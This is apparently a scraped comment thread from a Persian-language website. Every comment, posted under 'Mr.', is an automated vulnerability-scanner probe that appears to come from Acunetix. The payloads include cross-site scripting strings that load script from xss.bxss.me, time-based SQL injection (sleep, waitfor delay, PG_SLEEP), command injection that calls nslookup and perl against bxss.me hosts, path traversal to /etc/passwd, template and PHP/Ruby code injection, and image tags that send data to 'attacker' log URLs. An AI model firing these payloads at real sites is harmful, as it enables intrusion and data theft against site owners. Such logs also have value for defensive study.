<input autofocus onfocus=5bkR(9169)>

05/08/1400 04:15 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:15 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:15 ب.ظ
Mr.

}body{acu:Expre/**/SSion(5bkR(9236))}

05/08/1400 04:15 ب.ظ
Mr.

<% contenteditable onresize=5bkR(9917)>

05/08/1400 04:15 ب.ظ
Mr.

UY5G2
<ScRiPt >5bkR(9002)</ScRiPt>

05/08/1400 04:16 ب.ظ
Mr.

<WKU05B>AD6YL[!+!]</WKU05B>

05/08/1400 04:16 ب.ظ
Mr.

<ifRAme sRc=9320.com></IfRamE>

05/08/1400 04:16 ب.ظ
Mr.

<92ewuZ x=9185>

05/08/1400 04:16 ب.ظ
Mr.

<img sRc='http://attacker-9049/log.php?

05/08/1400 04:16 ب.ظ
Mr.

<2l6Qes<

05/08/1400 04:31 ب.ظ
Mr.

fwsCFgJ2

05/08/1400 04:31 ب.ظ
Mr.

1*

05/08/1400 04:31 ب.ظ
Mr.

1*

05/08/1400 04:31 ب.ظ
Mr.

1*

05/08/1400 04:31 ب.ظ
Mr.

1*

05/08/1400 04:31 ب.ظ
Mr.

-1 OR 2+597-597-1=0+0+0+1

05/08/1400 04:31 ب.ظ
Mr.

-1 OR 3+597-597-1=0+0+0+1

05/08/1400 04:31 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 04:31 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 04:31 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 04:31 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 04:31 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

6ATcyCI0'; waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

LxOEarJd'); waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

BGga9RvC')); waitfor delay '0:0:15' --

05/08/1400 04:31 ب.ظ
Mr.

-5 OR 351=(SELECT 351 FROM PG_SLEEP(15))--

05/08/1400 04:31 ب.ظ
Mr.

-5) OR 879=(SELECT 879 FROM PG_SLEEP(15))--

05/08/1400 04:31 ب.ظ
Mr.

-1)) OR 26=(SELECT 26 FROM PG_SLEEP(15))--

05/08/1400 04:31 ب.ظ
Mr.

FfNIoYQH' OR 713=(SELECT 713 FROM PG_SLEEP(15))--

05/08/1400 04:32 ب.ظ
Mr.

muQzEbuH') OR 614=(SELECT 614 FROM PG_SLEEP(15))--

05/08/1400 04:32 ب.ظ
Mr.

Z1BOC4QM')) OR 14=(SELECT 14 FROM PG_SLEEP(15))--

05/08/1400 04:32 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 04:32 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 04:32 ب.ظ
Mr.

1'"

05/08/1400 04:32 ب.ظ
Mr.

1����%2527%2522

05/08/1400 04:32 ب.ظ
Mr.

@@qdQE6

05/08/1400 04:38 ب.ظ
Mr.

'"()&%<acx><ScRiPt >pn4d(9549)</ScRiPt>

05/08/1400 04:38 ب.ظ
Mr.

'"()&%<acx><ScRiPt >pn4d(9448)</ScRiPt>

05/08/1400 04:38 ب.ظ
Mr.

9502870

05/08/1400 04:38 ب.ظ
Mr.

acu2911<s1﹥s2ʺs3ʹuca2911

05/08/1400 04:38 ب.ظ
Mr.

acux3999��z1��z2a�bcxuca3999

05/08/1400 04:38 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:38 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:38 ب.ظ
Mr.

response.write(9248545*9435956)

05/08/1400 04:38 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:38 ب.ظ
Mr.

'+response.write(9248545*9435956)+'

05/08/1400 04:38 ب.ظ
Mr.

"+response.write(9248545*9435956)+"

05/08/1400 04:38 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:38 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:38 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:38 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:38 ب.ظ
Mr.

<ScRiPt >pn4d(9928)</ScRiPt>

05/08/1400 04:38 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 04:39 ب.ظ
Mr.

<WKDKGM>HR8JY[!+!]</WKDKGM>

05/08/1400 04:39 ب.ظ
Mr.

echo pyixro$()\ evgbha\nz^xyu||a #' &echo pyixro$()\ evgbha\nz^xyu||a #|" &echo pyixro$()\ evgbha\nz^xyu||a #

05/08/1400 04:39 ب.ظ
Mr.

&echo wugezo$()\ tawttd\nz^xyu||a #' &echo wugezo$()\ tawttd\nz^xyu||a #|" &echo wugezo$()\ tawttd\nz^xyu||a #

05/08/1400 04:39 ب.ظ
Mr.

<script>pn4d(9527)</script>

05/08/1400 04:39 ب.ظ
Mr.

|echo kdeuqr$()\ hvvshu\nz^xyu||a #' |echo kdeuqr$()\ hvvshu\nz^xyu||a #|" |echo kdeuqr$()\ hvvshu\nz^xyu||a #

05/08/1400 04:39 ب.ظ
Mr.

(nslookup hitpdyruczsth973fb.bxss.me||perl -e "gethostbyname('hitpdyruczsth973fb.bxss.me')")

05/08/1400 04:39 ب.ظ
Mr.

$(nslookup hitjcfsdqwsrv3a639.bxss.me||perl -e "gethostbyname('hitjcfsdqwsrv3a639.bxss.me')")

05/08/1400 04:39 ب.ظ
Mr.

&(nslookup hitgwzbljqsokb730e.bxss.me||perl -e "gethostbyname('hitgwzbljqsokb730e.bxss.me')")&'\"`0&(nslookup hitgwzbljqsokb730e.bxss.me||perl -e "gethostbyname('hitgwzbljqsokb730e.bxss.me')")&`'

05/08/1400 04:39 ب.ظ
Mr.

|(nslookup hitecirjzlpljee818.bxss.me||perl -e "gethostbyname('hitecirjzlpljee818.bxss.me')")

05/08/1400 04:39 ب.ظ
Mr.

`(nslookup hitcxfmlvnxht9ae62.bxss.me||perl -e "gethostbyname('hitcxfmlvnxht9ae62.bxss.me')")`

05/08/1400 04:39 ب.ظ
Mr.

<ScR<ScRiPt>IpT>pn4d(9531)</sCr<ScRiPt>IpT>

05/08/1400 04:39 ب.ظ
Mr.

;(nslookup hittjlhxncvmmd3eb9.bxss.me||perl -e "gethostbyname('hittjlhxncvmmd3eb9.bxss.me')")|(nslookup hittjlhxncvmmd3eb9.bxss.me||perl -e "gethostbyname('hittjlhxncvmmd3eb9.bxss.me')")&(nslookup hittjlhxncvmmd3eb9.bxss.me||perl -e "gethostbyname('hittjlhxncvmmd3eb9.bxss.me')")

05/08/1400 04:39 ب.ظ
Mr.

<ScRiPt
>pn4d(9496)</ScRiPt>

05/08/1400 04:39 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9645></ScRiPt>

05/08/1400 04:39 ب.ظ
Mr.

<ScRiPt
>pn4d(9391)</ScRiPt>

05/08/1400 04:39 ب.ظ
Mr.

<svg  

�onload=pn4d(9179);>

05/08/1400 04:39 ب.ظ
Mr.

<isindex type=image src=1 onerror=pn4d(9537)>

05/08/1400 04:39 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9822'>

05/08/1400 04:39 ب.ظ
Mr.

<body onload=pn4d(9520)>

05/08/1400 04:40 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=pn4d(9610)>

05/08/1400 04:40 ب.ظ
Mr.

<img src=xyz OnErRor=pn4d(9833)>

05/08/1400 04:40 ب.ظ
Mr.

e55kkS13

05/08/1400 04:40 ب.ظ
Mr.

<img/src=">" onerror=alert(9587)>

05/08/1400 04:40 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 04:40 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 04:40 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 04:40 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%70%6E%34%64%289410%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:40 ب.ظ
Mr.

${9999461+9999133}

05/08/1400 04:40 ب.ظ
Mr.

../

05/08/1400 04:40 ب.ظ
Mr.

./

05/08/1400 04:40 ب.ظ
Mr.

\u003CScRiPt\pn4d(9610)\u003C/sCripT\u003E

05/08/1400 04:40 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 04:40 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 04:40 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 04:40 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 04:40 ب.ظ
Mr.

bxss.me

05/08/1400 04:40 ب.ظ
Mr.

&lt;ScRiPt&gt;pn4d(9429)&lt;/sCripT&gt;

05/08/1400 04:40 ب.ظ
Mr.

�<img acu onmouseover=pn4d(93221) //�>

05/08/1400 04:40 ب.ظ
Mr.

&n945536=v917425

05/08/1400 04:40 ب.ظ
Mr.

<input autofocus onfocus=pn4d(9260)>

05/08/1400 04:40 ب.ظ
Mr.

)

05/08/1400 04:40 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 04:40 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 04:40 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:41 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:41 ب.ظ
Mr.

}body{acu:Expre/**/SSion(pn4d(9287))}

05/08/1400 04:41 ب.ظ
Mr.

<% contenteditable onresize=pn4d(9788)>

05/08/1400 04:41 ب.ظ
Mr.

'"()

05/08/1400 04:41 ب.ظ
Mr.

'.gethostbyname(lc('hitwy'.'xnkscitdb83e7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(71).chr(111).chr(67).'

05/08/1400 04:41 ب.ظ
Mr.

".gethostbyname(lc("hitzz"."ifkvpmqu2cbe7.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(73).chr(111).chr(76)."

05/08/1400 04:41 ب.ظ
Mr.

bv44l
<ScRiPt >pn4d(9454)</ScRiPt>

05/08/1400 04:41 ب.ظ
Mr.

<WJTFK8>CDX8Y[!+!]</WJTFK8>

05/08/1400 04:41 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 04:41 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 04:41 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 04:41 ب.ظ
Mr.

<ifRAme sRc=9505.com></IfRamE>

05/08/1400 04:41 ب.ظ
Mr.

<53X5rG x=9446>

05/08/1400 04:41 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 04:41 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(101).concat(81).concat(110).concat(89)+(require"socket"
Socket.gethostbyname("hiten"+"cyetvfym0ba35.bxss.me.")[3].to_s)+"

05/08/1400 04:41 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 04:41 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 04:41 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(108).concat(70).concat(112).concat(85)+(require'socket'
Socket.gethostbyname('hitcg'+'jaxwrbqm05e99.bxss.me.')[3].to_s)+'

05/08/1400 04:41 ب.ظ
Mr.

<img sRc='http://attacker-9336/log.php?

05/08/1400 04:41 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 04:41 ب.ظ
Mr.

<A164KS<

05/08/1400 04:41 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 04:41 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 04:41 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 04:41 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 04:41 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 04:41 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 04:42 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8/.

05/08/1400 04:42 ب.ظ
Mr.

'"

05/08/1400 04:42 ب.ظ
Mr.

<!--

05/08/1400 04:42 ب.ظ
Mr.

'"()&%<acx><ScRiPt >RLlB(9683)</ScRiPt>

05/08/1400 04:42 ب.ظ
Mr.

'"()&%<acx><ScRiPt >RLlB(9896)</ScRiPt>

05/08/1400 04:42 ب.ظ
Mr.

9692494

05/08/1400 04:42 ب.ظ
Mr.

acu4898<s1﹥s2ʺs3ʹuca4898

05/08/1400 04:42 ب.ظ
Mr.

acux4676��z1��z2a�bcxuca4676

05/08/1400 04:42 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 04:42 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 04:42 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 04:42 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 04:43 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 04:43 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 04:43 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 04:43 ب.ظ
Mr.

<ScRiPt >RLlB(9392)</ScRiPt>

05/08/1400 04:43 ب.ظ
Mr.

<W4VZBU>1WKKL[!+!]</W4VZBU>

05/08/1400 04:43 ب.ظ
Mr.

<script>RLlB(9901)</script>

05/08/1400 04:43 ب.ظ
Mr.

<ScR<ScRiPt>IpT>RLlB(9464)</sCr<ScRiPt>IpT>

05/08/1400 04:43 ب.ظ
Mr.

<ScRiPt
>RLlB(9297)</ScRiPt>

05/08/1400 04:43 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9022></ScRiPt>

05/08/1400 04:43 ب.ظ
Mr.

<ScRiPt
>RLlB(9218)</ScRiPt>

05/08/1400 04:43 ب.ظ
Mr.

<svg  

�onload=RLlB(9223);>

05/08/1400 04:43 ب.ظ
Mr.

<isindex type=image src=1 onerror=RLlB(9660)>

05/08/1400 04:43 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9805'>

05/08/1400 04:43 ب.ظ
Mr.

<body onload=RLlB(9463)>

05/08/1400 04:43 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=RLlB(9746)>

05/08/1400 04:43 ب.ظ
Mr.

<img src=xyz OnErRor=RLlB(9840)>

05/08/1400 04:43 ب.ظ
Mr.

<img/src=">" onerror=alert(9062)>

05/08/1400 04:43 ب.ظ
Mr.

%0D%0A%0D%0A%0D%0A%3C%53%63%52%69%50%74%20%3E%52%4C%6C%42%289358%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 04:44 ب.ظ
Mr.

\u003CScRiPt\RLlB(9108)\u003C/sCripT\u003E

05/08/1400 04:44 ب.ظ
Mr.

&lt;ScRiPt&gt;RLlB(9425)&lt;/sCripT&gt;

05/08/1400 04:44 ب.ظ
Mr.

�<img acu onmouseover=RLlB(95171) //�>

05/08/1400 04:44 ب.ظ
Mr.

<input autofocus onfocus=RLlB(9721)>

05/08/1400 04:44 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 04:44 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 04:44 ب.ظ
Mr.

}body{acu:Expre/**/SSion(RLlB(9804))}

05/08/1400 04:44 ب.ظ
Mr.

<% contenteditable onresize=RLlB(9071)>

05/08/1400 04:44 ب.ظ
Mr.

LimwJ
<ScRiPt >RLlB(9970)</ScRiPt>

05/08/1400 04:44 ب.ظ
Mr.

<WSBKPP>TYGRO[!+!]</WSBKPP>

05/08/1400 04:44 ب.ظ
Mr.

<ifRAme sRc=9020.com></IfRamE>

05/08/1400 04:44 ب.ظ
Mr.

<u7ZahF x=9493>

05/08/1400 04:44 ب.ظ
Mr.

<img sRc='http://attacker-9920/log.php?

05/08/1400 04:44 ب.ظ
Mr.

<qUPDI8<

05/08/1400 05:41 ب.ظ
Mr.

pQKMZihU

05/08/1400 05:41 ب.ظ
Mr.

1*

05/08/1400 05:41 ب.ظ
Mr.

1*

05/08/1400 05:41 ب.ظ
Mr.

1*

05/08/1400 05:41 ب.ظ
Mr.

1*

05/08/1400 05:41 ب.ظ
Mr.

-1 OR 2+913-913-1=0+0+0+1

05/08/1400 05:41 ب.ظ
Mr.

-1 OR 3+913-913-1=0+0+0+1

05/08/1400 05:41 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 05:42 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 05:43 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 05:43 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 05:46 ب.ظ
Mr.

-1; waitfor delay '0:0:15' --

05/08/1400 05:46 ب.ظ
Mr.

-1); waitfor delay '0:0:15' --

05/08/1400 05:46 ب.ظ
Mr.

-1)); waitfor delay '0:0:15' --

05/08/1400 05:46 ب.ظ
Mr.

1 waitfor delay '0:0:15' --

05/08/1400 05:46 ب.ظ
Mr.

qY1P4DXv'; waitfor delay '0:0:15' --

05/08/1400 05:46 ب.ظ
Mr.

KwVC05JL'); waitfor delay '0:0:15' --

05/08/1400 05:46 ب.ظ
Mr.

rOo0igyl')); waitfor delay '0:0:15' --

05/08/1400 05:49 ب.ظ
Mr.

-5) OR 407=(SELECT 407 FROM PG_SLEEP(0))--

05/08/1400 05:49 ب.ظ
Mr.

-5) OR 65=(SELECT 65 FROM PG_SLEEP(0))--

05/08/1400 05:49 ب.ظ
Mr.

-5) OR 891=(SELECT 891 FROM PG_SLEEP(6))--

05/08/1400 05:49 ب.ظ
Mr.

-1)) OR 158=(SELECT 158 FROM PG_SLEEP(15))--

05/08/1400 05:49 ب.ظ
Mr.

RoVVcyqB' OR 221=(SELECT 221 FROM PG_SLEEP(15))--

05/08/1400 05:49 ب.ظ
Mr.

7br3ovUV') OR 316=(SELECT 316 FROM PG_SLEEP(15))--

05/08/1400 05:49 ب.ظ
Mr.

kBuPFxrR')) OR 716=(SELECT 716 FROM PG_SLEEP(15))--

05/08/1400 05:49 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 05:49 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 05:49 ب.ظ
Mr.

1'"

05/08/1400 05:49 ب.ظ
Mr.

1����%2527%2522

05/08/1400 05:49 ب.ظ
Mr.

@@ddZK8

05/08/1400 05:53 ب.ظ
Mr.

'"()&%<acx><ScRiPt >SpYV(9518)</ScRiPt>

05/08/1400 05:53 ب.ظ
Mr.

'"()&%<acx><ScRiPt >SpYV(9929)</ScRiPt>

05/08/1400 05:53 ب.ظ
Mr.

9256037

05/08/1400 05:53 ب.ظ
Mr.

acu7560<s1﹥s2ʺs3ʹuca7560

05/08/1400 05:53 ب.ظ
Mr.

acux3574��z1��z2a�bcxuca3574

05/08/1400 05:53 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 05:54 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 05:54 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 05:54 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 05:54 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 05:54 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 05:54 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 05:54 ب.ظ
Mr.

<ScRiPt >SpYV(9649)</ScRiPt>

05/08/1400 05:54 ب.ظ
Mr.

<WYWCRQ>LWKZY[!+!]</WYWCRQ>

05/08/1400 05:54 ب.ظ
Mr.

<script>SpYV(9139)</script>

05/08/1400 05:54 ب.ظ
Mr.

<ScR<ScRiPt>IpT>SpYV(9079)</sCr<ScRiPt>IpT>

05/08/1400 05:55 ب.ظ
Mr.

<ScRiPt
>SpYV(9890)</ScRiPt>

05/08/1400 05:55 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9395></ScRiPt>

05/08/1400 05:55 ب.ظ
Mr.

<ScRiPt
>SpYV(9913)</ScRiPt>

05/08/1400 05:55 ب.ظ
Mr.

<svg  

�onload=SpYV(9603);>

05/08/1400 05:55 ب.ظ
Mr.

<isindex type=image src=1 onerror=SpYV(9574)>

05/08/1400 05:55 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9535'>

05/08/1400 05:55 ب.ظ
Mr.

<body onload=SpYV(9440)>

05/08/1400 05:55 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=SpYV(9947)>

05/08/1400 05:55 ب.ظ
Mr.

<img src=xyz OnErRor=SpYV(9075)>

05/08/1400 05:55 ب.ظ
Mr.

<img/src=">" onerror=alert(9979)>

05/08/1400 05:55 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%53%70%59%56%289375%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 05:55 ب.ظ
Mr.

\u003CScRiPt\SpYV(9904)\u003C/sCripT\u003E

05/08/1400 05:55 ب.ظ
Mr.

&lt;ScRiPt&gt;SpYV(9616)&lt;/sCripT&gt;

05/08/1400 05:55 ب.ظ
Mr.

�<img acu onmouseover=SpYV(92601) //�>

05/08/1400 05:56 ب.ظ
Mr.

<input autofocus onfocus=SpYV(9894)>

05/08/1400 05:56 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 05:56 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 05:56 ب.ظ
Mr.

}body{acu:Expre/**/SSion(SpYV(9601))}

05/08/1400 05:56 ب.ظ
Mr.

<% contenteditable onresize=SpYV(9142)>

05/08/1400 05:56 ب.ظ
Mr.

UaefU
<ScRiPt >SpYV(9328)</ScRiPt>

05/08/1400 05:56 ب.ظ
Mr.

<WRSIII>NX6T2[!+!]</WRSIII>

05/08/1400 05:56 ب.ظ
Mr.

<ifRAme sRc=9600.com></IfRamE>

05/08/1400 05:56 ب.ظ
Mr.

<D5h8S8 x=9058>

05/08/1400 05:56 ب.ظ
Mr.

<img sRc='http://attacker-9334/log.php?

05/08/1400 05:57 ب.ظ
Mr.

<0RdbWu<

05/08/1400 06:01 ب.ظ
Mr.

response.write(9632883*9987299)

05/08/1400 06:01 ب.ظ
Mr.

'+response.write(9632883*9987299)+'

05/08/1400 06:01 ب.ظ
Mr.

"+response.write(9632883*9987299)+"

05/08/1400 06:01 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 06:01 ب.ظ
Mr.

echo dvmkur$()\ eekdkx\nz^xyu||a #' &echo dvmkur$()\ eekdkx\nz^xyu||a #|" &echo dvmkur$()\ eekdkx\nz^xyu||a #

05/08/1400 06:01 ب.ظ
Mr.

&echo ovyakx$()\ yzmppj\nz^xyu||a #' &echo ovyakx$()\ yzmppj\nz^xyu||a #|" &echo ovyakx$()\ yzmppj\nz^xyu||a #

05/08/1400 06:01 ب.ظ
Mr.

|echo ntznpy$()\ kgelzc\nz^xyu||a #' |echo ntznpy$()\ kgelzc\nz^xyu||a #|" |echo ntznpy$()\ kgelzc\nz^xyu||a #

05/08/1400 06:01 ب.ظ
Mr.

(nslookup hitdwieeqhhay0ea89.bxss.me||perl -e "gethostbyname('hitdwieeqhhay0ea89.bxss.me')")

05/08/1400 06:01 ب.ظ
Mr.

$(nslookup hitpngqsukhppb9a93.bxss.me||perl -e "gethostbyname('hitpngqsukhppb9a93.bxss.me')")

05/08/1400 06:01 ب.ظ
Mr.

&(nslookup hitrselsbcekg1e700.bxss.me||perl -e "gethostbyname('hitrselsbcekg1e700.bxss.me')")&'\"`0&(nslookup hitrselsbcekg1e700.bxss.me||perl -e "gethostbyname('hitrselsbcekg1e700.bxss.me')")&`'

05/08/1400 06:01 ب.ظ
Mr.

|(nslookup hitmxmxgpgbsi232ba.bxss.me||perl -e "gethostbyname('hitmxmxgpgbsi232ba.bxss.me')")

05/08/1400 06:01 ب.ظ
Mr.

`(nslookup hitcdzfhvprpsbc132.bxss.me||perl -e "gethostbyname('hitcdzfhvprpsbc132.bxss.me')")`

05/08/1400 06:01 ب.ظ
Mr.

;(nslookup hitaashbqnbhi236fe.bxss.me||perl -e "gethostbyname('hitaashbqnbhi236fe.bxss.me')")|(nslookup hitaashbqnbhi236fe.bxss.me||perl -e "gethostbyname('hitaashbqnbhi236fe.bxss.me')")&(nslookup hitaashbqnbhi236fe.bxss.me||perl -e "gethostbyname('hitaashbqnbhi236fe.bxss.me')")

05/08/1400 06:01 ب.ظ
Mr.

Gh6Y86EJ

05/08/1400 06:02 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 06:02 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 06:02 ب.ظ
Mr.

../

05/08/1400 06:02 ب.ظ
Mr.

./

05/08/1400 06:02 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 06:02 ب.ظ
Mr.

${10000030+9999073}

05/08/1400 06:02 ب.ظ
Mr.

)

05/08/1400 06:02 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 06:02 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 06:02 ب.ظ
Mr.

&n971772=v967325

05/08/1400 06:02 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 06:02 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 06:03 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 06:03 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 06:03 ب.ظ
Mr.

'"()

05/08/1400 06:03 ب.ظ
Mr.

bxss.me

05/08/1400 06:03 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 06:03 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 06:03 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 06:03 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 06:03 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 06:03 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 06:03 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 06:03 ب.ظ
Mr.

'.gethostbyname(lc('hitgg'.'lodmjsxj34817.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(69).chr(116).chr(80).'

05/08/1400 06:03 ب.ظ
Mr.

".gethostbyname(lc("hitsl"."bgxokvpo8991b.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(80).chr(111).chr(71)."

05/08/1400 06:03 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 06:03 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 06:03 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(111).concat(66).concat(119).concat(79)+(require"socket"
Socket.gethostbyname("hithf"+"rkonriht480c8.bxss.me.")[3].to_s)+"

05/08/1400 06:03 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(102).concat(90).concat(108).concat(82)+(require'socket'
Socket.gethostbyname('hitzr'+'uzrpntwlff61e.bxss.me.')[3].to_s)+'

05/08/1400 06:03 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 06:03 ب.ظ
Mr.

